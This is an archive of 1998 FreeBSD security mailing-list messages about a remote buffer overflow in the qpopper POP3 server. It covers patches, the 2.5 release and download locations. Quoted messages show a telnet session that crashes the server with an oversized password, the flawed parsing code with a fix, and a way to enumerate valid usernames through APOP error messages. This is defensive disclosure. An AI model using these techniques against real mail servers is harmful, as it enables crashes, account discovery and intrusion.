xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > -ERR Argument 1 "xxxxxxxxxxxxxxxxx" (truncated) exceeds maximum permitted > > size. > > > > Handled it just fine. > > > > Then, I decided to try a VALID username: > > > > [OverKill]:/$ telnet localhost pop3 > > Trying 127.0.0.1... > > Connected to localhost. > > Escape character is '^]'. > > +OK QPOP (version 2.4) at Victim.Com starting. > > user valid > > +OK Password required for valid. > > pass > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx > > Connection closed by foreign host. > > > > It segfaulted and dumped core. > > > > Damnit, Jim, I'm a Doctor not a C programmer! I have managed to locate > > the portion of the code that is bypassing the " -ERR Command > > "xxxxxxxxxxxxxxxxx" (truncated) exceedes maximum permitted size. " code > > from the installed patches: > > > > In pop_parse.c, we find: > > > > /* > > * This is kinda gross. Passwords have to be parsed diffrently > > * as they may contain spaces. If you think of a cleaner way, > > * do it. The "p->pop_command[0] == 'p'" is so save a call to > > * strcmp() on ever call to pop_parse(); This parsing keeps > > * leading and trailing speces behind for the password command. > > */ > > if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == > > 0) { > > if (*mp != 0) { > > p->pop_parm[1] = mp; > > if (strlen(mp) > 0) { > > mp = mp + strlen(mp) - 1; > > while (*mp == 0xa || *mp == 0xd) *mp-- = 0; > > } > > > > Looks like basically that if the parser sees that the command was actually > > a password argument, it doesn't send it through the truncate code. > > Looks like qpopper after the "if(p->pop_command..." bit assumes everything > else in the buffer is the password except any trailing CR/LF characters, which > it removes. I cannot understand the "if (strlen(mp) > 0) {" test, because the > previous "if (*mp != 0) {" test should guarantee that strlen() will always at > least return 1. > > For those who want to be consistent about limiting argument length using > MAXPARMLEN, you can try this snippit instead of the above existing snippit in > pop_parse.c: > > if(p->pop_command[0] == 'p' && strcmp(p->pop_command,"pass") == 0) { > if (*mp != 0) { > if (strlen(mp) > MAXPARMLEN) { > mp[MAXPARMLEN] = '\0'; > pop_msg(p,POP_FAILURE, > "Argument %d \"%s\" (truncated) exceeds maximum permitted > size.", > i+1, mp); > return(-1); > } > p->pop_parm[1] = mp; > mp = mp + strlen(mp) - 1; > while (*mp == 0xa || *mp == 0xd) *mp-- = 0; > return(1); > } else > return (-1); > } > > > PLEASE be aware that you need a large enough MAXPARMLEN defined in popper.h to > handle large passwords or APOP depending on your individual needs. I've been > using 32 on my system, which should permit APOP to work. > > > Another fun qpopper trivia fact for the security conscious: While looking at > the APOP stuff, I see that it is possible to glean valid user names from sites > using certain configurations of qpopper with APOP support. For example: > > localhost# telnet localhost 110 > +OK QPOP (version 2.41beta1) at localhost starting. > <18115.899106609@localhost> > APOP bogus-user 1638de71888f8c3ff023ac5c38621211 > -ERR Password supplied for "bogus" is incorrect. > +OK Pop server at localhost signing off. > Connection closed by foreign host. > localhost# telnet localhost 110 > +OK QPOP (version 2.41beta1) at localhost starting. > <18119.899106628@localhost> > APOP real-user 8463af56e9a5d72cc84012ad7748f92c > -ERR not authorized > +OK Pop server at localhost signing off. > Connection closed by foreign host. > localhost# > > Nice. In some cases where APOP support is compiled in but the APOP database > does not exist, the error message on a valid user might be "-ERR POP > authorization DB not available (real-user)" instead of the "-ERR not > authorized" message. I don't know if this would work for sites with properly > configured APOP or not. It worked on my own machine which does NOT use APOP > but had APOP compiled in by default. > > Aaron out. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 01:06:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA28272 for freebsd-security-outgoing; Tue, 30 Jun 1998 01:06:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA28110 for ; Tue, 30 Jun 1998 01:05:54 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id BAA07496; Tue, 30 Jun 1998 01:05:22 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Jeremy Shaffner cc: freebsd-security@FreeBSD.ORG Subject: Re: Stable, Complete, qpopper patch In-reply-to: Your message of "Mon, 29 Jun 1998 12:33:56 CDT." Date: Tue, 30 Jun 1998 01:05:22 -0700 Message-ID: <7493.899193922@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > 1) Have things quieted down enough so that the first and subsequent > problems (and broken patches) have now all been fixed? Yes, I believe so. > 2) Do the patches only apply to 2.41beta1 or are they also good for 2.3 or > 2.4? Don't know. > 3) Can the patches be applied manually to the source files downloaded from > Qualcomm, or must the port be built from the current source tree? (ie, > fetch, build and install?) Don't know. > 4) If the latter for #3 is the only way, and the answer to #2 is yes, can > I change the DISTNAME in the Makefile if I don't want 2.41beta1? Don't know. :-) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 02:37:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA13289 for freebsd-security-outgoing; Tue, 30 Jun 1998 02:37:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hydrogen.nike.efn.org (resnet.uoregon.edu [128.223.144.32]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA13253 for ; Tue, 30 Jun 1998 02:36:55 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by hydrogen.nike.efn.org (8.8.8/8.8.7) id CAA28972; Tue, 30 Jun 1998 02:36:43 -0700 (PDT) Message-ID: <19980630023639.02857@hydrogen.nike.efn.org> Date: Tue, 30 Jun 1998 02:36:39 -0700 From: John-Mark Gurney To: andrewr Cc: Christoph Kukulies , freebsd-security@FreeBSD.ORG Subject: Re: xlock References: <199806290632.IAA00836@gilberto.physik.RWTH-Aachen.DE> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: ; from andrewr on Mon, Jun 29, 1998 at 08:27:49AM -0400 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 2.2.6-STABLE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org andrewr scribbled this message on Jun 29: > Also, I am porting a console locking program (doesn't allow VT switching), > from linux, but I have been having trouble with the actual stopping of the > allowing of VT switching. I have tried setting vtmode to be handled by > the process, then using an ioctl to execute this. This failed. Then, I > tried using flock(), that failed. If you have any ideas and would like to > know what I did before (dealing with flock() and ioctl(), just ask). I have modifications to lock that does this... it really isn't hard... you just simply modify the relsig of vt_mode to a signal, and simply ignore the signal... syscons will only switch away when you tell it that it can... this is how X restores the video mode for syscons... > On Mon, 29 Jun 1998, Christoph Kukulies wrote: > > > > > Alarmed by recent buffer overflow attacks on Linux machines in > > my vicinity (an exploit for this is available) I thought about > > xlock under FreeBSD and would like to know whether the > > security hole has been sorted out under FreeBSD 2.2.x or what > > measures are advised to prevent it. p.s. why do people not spend the 2 seconds it takes to remove sigs?? -- John-Mark Gurney Voice: +1 541 683 7109 Cu Networking P.O. Box 5693, 97405 Live in Peace, destroy Micro$oft, support free software, run FreeBSD Don't trust anyone you don't have the source for To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 09:24:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA18014 for freebsd-security-outgoing; Tue, 30 Jun 1998 09:24:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns.cityip.co.za (ns.cityip.co.za [196.25.223.140]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA18006 for ; Tue, 30 Jun 1998 09:24:03 -0700 (PDT) (envelope-from wjv@cityip.co.za) Received: from wjv by ns.cityip.co.za with local (Exim 1.82 #2) id 0yr3CI-0000Hp-00; Tue, 30 Jun 1998 18:23:58 +0200 Message-ID: <19980630182358.B1060@cityip.co.za> Date: Tue, 30 Jun 1998 18:23:58 +0200 From: Johann Visagie To: security@internet.org.za, security@FreeBSD.ORG Subject: New Qpopper released to fix hole Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i X-PGP: ftp://ftp.cityip.co.za/users/wjv/pubkey.asc X-URL: http://www.cityip.co.za/~wjv/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z Read the README in the same directory for more info. -- V Johann Visagie | Email: wjv@CityIP.co.za | Tel: +27 21 419-7878 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 11:32:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09309 for freebsd-security-outgoing; Tue, 30 Jun 1998 11:32:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA09137; Tue, 30 Jun 1998 11:32:02 -0700 (PDT) (envelope-from jer@jorsm.com) Received: from localhost (jer@localhost) by mercury.jorsm.com (8.8.7/8.8.7) with SMTP id NAA08633; Tue, 30 Jun 1998 13:30:56 -0500 (CDT) Date: Tue, 30 Jun 1998 13:30:55 -0500 (CDT) From: Jeremy Shaffner To: Brian Somers cc: Sasha Egan , brian@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Remote exploit in qpopper. In-Reply-To: <199806300740.IAA11820@awfulhak.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There is also a new version released today from Qualcomm. 2.5 is patched against all known problems. ftp://ftp.qualcomm.com/eudora/servers/popper/. FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an unpatched 2.41beta1. Although it did cause a overflow and popper exited with a signal 11, it did not provide a root shell. The author of this particular exploit (It's available on the bugtraq list or from rootshell) says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The exploit itself can be run from any platform.) The patches that Jordan has made do work. You can get the new -current port and build that, or get 2.5 from qualcomm and build it yourself. On Tue, 30 Jun 1998, Brian Somers wrote: > > > > Hey Brian, > > I dunno if you have been watching some of the lists but there is some > > definate problems in Qualcom's popper... > [.....] > > Looks like I spoke too soon. A pile of patches have now been made to > popper :-) > > > Sasha Egan > > Belen Consolidated Schools > > Belen, NM > > (505) 861-4981 > > pager: (505) 875-8866 > > -- > Brian , , > > Don't _EVER_ lose your sense of humour.... > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -===================================================================- Jeremy Shaffner JORSM Internet Senior Technical Support Northwest Indiana's Premium jer@jorsm.com Internet Service Provider support@jorsm.com http://www.jorsm.com -===================================================================- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 13:15:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA25988 for freebsd-security-outgoing; Tue, 30 Jun 1998 13:15:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.9]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA25970 for ; Tue, 30 Jun 1998 13:15:36 -0700 (PDT) (envelope-from nicole@mediacity.com) Received: (qmail 26824 invoked from network); 30 Jun 1998 20:15:34 -0000 Received: from dogbert.mediacity.com (@208.138.36.62) by mail001.mediacity.com with SMTP; 30 Jun 1998 20:15:34 -0000 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Tue, 30 Jun 1998 13:15:38 -0700 (PDT) Organization: MediaCity World From: Nicole To: Jeremy Shaffner Subject: Re: Remote exploit in qpopper. Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG, Sasha Egan , Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30-Jun-98 Jeremy Shaffner wrote: > > There is also a new version released today from Qualcomm. 2.5 is > patched against all known problems. > ftp://ftp.qualcomm.com/eudora/servers/popper/. > I just tried to go there and the eudora directory doesn't exist. i also tried their other reccoemnded site. Anyone know of alternate sites? Nicole > > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an > unpatched 2.41beta1. Although it did cause a overflow and popper exited > with a signal 11, it did not provide a root shell. The author of this > particular exploit (It's available on the bugtraq list or from rootshell) > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The > exploit itself can be run from any platform.) > > The patches that Jordan has made do work. You can get the new -current > port and build that, or get 2.5 from qualcomm and build it yourself. > > On Tue, 30 Jun 1998, Brian Somers wrote: > >> > >> > Hey Brian, >> > I dunno if you have been watching some of the lists but there is some >> > definate problems in Qualcom's popper... >> [.....] >> >> Looks like I spoke too soon. A pile of patches have now been made to >> popper :-) >> >> > Sasha Egan >> > Belen Consolidated Schools >> > Belen, NM >> > (505) 861-4981 >> > pager: (505) 875-8866 >> >> -- >> Brian , , >> >> Don't _EVER_ lose your sense of humour.... >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> > > > -===================================================================- > Jeremy Shaffner JORSM Internet > Senior Technical Support Northwest Indiana's Premium > jer@jorsm.com Internet Service Provider > support@jorsm.com http://www.jorsm.com > -===================================================================- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message |\ __ /| (`\ | o_o |__ ) ) // \\ Nicole Harrington | SR Systems Administrator -------------------(((---(((----------------------- nicole@mediacity.com - nicole@ispchannel.com www.mediacity.com - www.ispchannel.com Phone: 650-237-1464 - Pager: 415-301-2482 Powered By Coca-Cola and FreeBSD Why do doctors call what they do practice? Microsoft: What bug would you like today? ---------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 14:02:30 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04395 for freebsd-security-outgoing; Tue, 30 Jun 1998 14:02:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04295; Tue, 30 Jun 1998 14:01:32 -0700 (PDT) (envelope-from jer@jorsm.com) Received: from localhost (jer@localhost) by mercury.jorsm.com (8.8.7/8.8.7) with SMTP id QAA16663; Tue, 30 Jun 1998 16:01:17 -0500 (CDT) Date: Tue, 30 Jun 1998 16:01:16 -0500 (CDT) From: Jeremy Shaffner To: Nicole cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, brian@FreeBSD.ORG, Sasha Egan , Brian Somers Subject: Re: Remote exploit in qpopper. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Heh..the bastards...They changed it to oldeudora. They could have done that before mailing me with the URL I gave you. On Tue, 30 Jun 1998, Nicole wrote: > > On 30-Jun-98 Jeremy Shaffner wrote: > > > > There is also a new version released today from Qualcomm. 2.5 is > > patched against all known problems. > > ftp://ftp.qualcomm.com/eudora/servers/popper/. > > > > > I just tried to go there and the eudora directory doesn't exist. i also tried > their other reccoemnded site. Anyone know of alternate sites? > > > Nicole > > > > > > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an > > unpatched 2.41beta1. Although it did cause a overflow and popper exited > > with a signal 11, it did not provide a root shell. The author of this > > particular exploit (It's available on the bugtraq list or from rootshell) > > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The > > exploit itself can be run from any platform.) > > > > The patches that Jordan has made do work. You can get the new -current > > port and build that, or get 2.5 from qualcomm and build it yourself. > > > > On Tue, 30 Jun 1998, Brian Somers wrote: > > > >> > > >> > Hey Brian, > >> > I dunno if you have been watching some of the lists but there is some > >> > definate problems in Qualcom's popper... > >> [.....] > >> > >> Looks like I spoke too soon. A pile of patches have now been made to > >> popper :-) > >> > >> > Sasha Egan > >> > Belen Consolidated Schools > >> > Belen, NM > >> > (505) 861-4981 > >> > pager: (505) 875-8866 > >> > >> -- > >> Brian , , > >> > >> Don't _EVER_ lose your sense of humour.... > >> > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-questions" in the body of the message > >> > > > > > > -===================================================================- > > Jeremy Shaffner JORSM Internet > > Senior Technical Support Northwest Indiana's Premium > > jer@jorsm.com Internet Service Provider > > support@jorsm.com http://www.jorsm.com > > -===================================================================- > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe security" in the body of the message > > |\ __ /| (`\ > | o_o |__ ) ) > // \\ > Nicole Harrington | SR Systems Administrator > -------------------(((---(((----------------------- > > nicole@mediacity.com - nicole@ispchannel.com > www.mediacity.com - www.ispchannel.com > Phone: 650-237-1464 - Pager: 415-301-2482 > > Powered By Coca-Cola and FreeBSD > > Why do doctors call what they do practice? > Microsoft: What bug would you like today? > ---------------------------------------------------- > > -===================================================================- Jeremy Shaffner JORSM Internet Senior Technical Support Northwest Indiana's Premium jer@jorsm.com Internet Service Provider support@jorsm.com http://www.jorsm.com -===================================================================- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 15:11:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14604 for freebsd-security-outgoing; Tue, 30 Jun 1998 15:11:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from andrsn.stanford.edu (root@andrsn.Stanford.EDU [36.33.0.163]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14595 for ; Tue, 30 Jun 1998 15:11:02 -0700 (PDT) (envelope-from andrsn@andrsn.stanford.edu) Received: from localhost (andrsn@localhost.stanford.edu [127.0.0.1]) by andrsn.stanford.edu (8.8.8/8.6.12) with SMTP id PAA06961; Tue, 30 Jun 1998 15:10:00 -0700 (PDT) Date: Tue, 30 Jun 1998 15:10:00 -0700 (PDT) From: Annelise Anderson To: Johann Visagie cc: security@internet.org.za, security@FreeBSD.ORG Subject: Re: New Qpopper released to fix hole In-Reply-To: <19980630182358.B1060@cityip.co.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 30 Jun 1998, Johann Visagie wrote: > > ftp://ftp.qualcomm.com/eudora/servers/unix/popper/qpopper2.5.tar.Z I cvsupped ports and tried to make install qpopper2.5. It cannot find this distfile, which turns out to be in "oldeudora" rather than "eudora". It is also not on ftp.freebsd.org, at least not in the directory where the port tries to find it. Since this vulnerability was announced I have a bunch of messages about people trying to use popper who don't have accounts on my machine (I'm the only person who has an account). Annelise P.S. It installed, but the binary /usr/local/libexec/popper is a different size from the one in the src directory in /usr/ports. I do find that a little odd. > Read the README in the same directory for more info. > > -- V > > Johann Visagie | Email: wjv@CityIP.co.za | Tel: +27 21 419-7878 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 16:09:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA26602 for freebsd-security-outgoing; Tue, 30 Jun 1998 16:09:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.9]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id QAA26575 for ; Tue, 30 Jun 1998 16:08:56 -0700 (PDT) (envelope-from nicole@mediacity.com) Received: (qmail 2747 invoked from network); 30 Jun 1998 23:08:51 -0000 Received: from dogbert.mediacity.com (@208.138.36.62) by mail001.mediacity.com with SMTP; 30 Jun 1998 23:08:51 -0000 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Tue, 30 Jun 1998 16:08:55 -0700 (PDT) Organization: MediaCity World From: Nicole To: Jeremy Shaffner Subject: Re: Remote exploit in qpopper. Cc: Brian Somers , Sasha Egan , brian@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30-Jun-98 Jeremy Shaffner wrote: > Heh..the bastards...They changed it to oldeudora. They could have done > that before mailing me with the URL I gave you. > Ah ha... Yes they are on the move arn't they.. That wasn't there when I went there... Tap tap tap tap... Nicole > On Tue, 30 Jun 1998, Nicole wrote: > >> >> On 30-Jun-98 Jeremy Shaffner wrote: >> > >> > There is also a new version released today from Qualcomm. 2.5 is >> > patched against all known problems. >> > ftp://ftp.qualcomm.com/eudora/servers/popper/. >> > >> >> >> I just tried to go there and the eudora directory doesn't exist. i also >> tried >> their other reccoemnded site. Anyone know of alternate sites? >> >> >> Nicole >> >> >> > >> > FWIW, I compiled the exploit (known as qpush or qpop) and tried it on an >> > unpatched 2.41beta1. Although it did cause a overflow and popper exited >> > with a signal 11, it did not provide a root shell. The author of this >> > particular exploit (It's available on the bugtraq list or from rootshell) >> > says that it only works on 2.2 or 2.41b1 and only on Linux systems. (The >> > exploit itself can be run from any platform.) >> > >> > The patches that Jordan has made do work. You can get the new -current >> > port and build that, or get 2.5 from qualcomm and build it yourself. >> > >> > On Tue, 30 Jun 1998, Brian Somers wrote: >> > >> >> > >> >> > Hey Brian, >> >> > I dunno if you have been watching some of the lists but there is some >> >> > definate problems in Qualcom's popper... >> >> [.....] >> >> >> >> Looks like I spoke too soon. A pile of patches have now been made to >> >> popper :-) >> >> >> >> > Sasha Egan >> >> > Belen Consolidated Schools >> >> > Belen, NM >> >> > (505) 861-4981 >> >> > pager: (505) 875-8866 >> >> >> >> -- >> >> Brian , , >> >> >> >> Don't _EVER_ lose your sense of humour.... >> >> >> >> >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> >> with "unsubscribe freebsd-questions" in the body of the message >> >> >> > >> > >> > -===================================================================- >> > Jeremy Shaffner JORSM Internet >> > Senior Technical Support Northwest Indiana's Premium >> > jer@jorsm.com Internet Service Provider >> > support@jorsm.com http://www.jorsm.com >> > -===================================================================- >> > >> > >> > To Unsubscribe: send mail to majordomo@FreeBSD.org >> > with "unsubscribe security" in the body of the message >> >> |\ __ /| (`\ >> | o_o |__ ) ) >> // \\ >> Nicole Harrington | SR Systems Administrator >> -------------------(((---(((----------------------- >> >> nicole@mediacity.com - nicole@ispchannel.com >> www.mediacity.com - www.ispchannel.com >> Phone: 650-237-1464 - Pager: 415-301-2482 >> >> Powered By Coca-Cola and FreeBSD >> >> Why do doctors call what they do practice? >> Microsoft: What bug would you like today? >> ---------------------------------------------------- >> >> > > > -===================================================================- > Jeremy Shaffner JORSM Internet > Senior Technical Support Northwest Indiana's Premium > jer@jorsm.com Internet Service Provider > support@jorsm.com http://www.jorsm.com > -===================================================================- |\ __ /| (`\ | o_o |__ ) ) // \\ Nicole Harrington | SR Systems Administrator -------------------(((---(((----------------------- nicole@mediacity.com - nicole@ispchannel.com www.mediacity.com - www.ispchannel.com Phone: 650-237-1464 - Pager: 415-301-2482 Powered By Coca-Cola and FreeBSD Why do doctors call what they do practice? Microsoft: What bug would you like today? ---------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 30 17:44:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA13975 for freebsd-security-outgoing; Tue, 30 Jun 1998 17:44:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from the.oneinsane.net (insane@gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA13933 for ; Tue, 30 Jun 1998 17:43:44 -0700 (PDT) (envelope-from insane@the.oneinsane.net) Received: (from insane@localhost) by the.oneinsane.net (8.9.0/8.9.0) id RAA25277; Tue, 30 Jun 1998 17:43:36 -0700 (PDT) Message-ID: <19980630174336.A25206@oneinsane.net> Date: Tue, 30 Jun 1998 17:43:36 -0700 From: "Ron 'The Insane One' Rosson" To: Nicole Cc: freebsd-security@FreeBSD.ORG Subject: Re: Remote exploit in qpopper. Mail-Followup-To: Nicole , freebsd-security@freebsd.org References: Mime-Version: 1.0 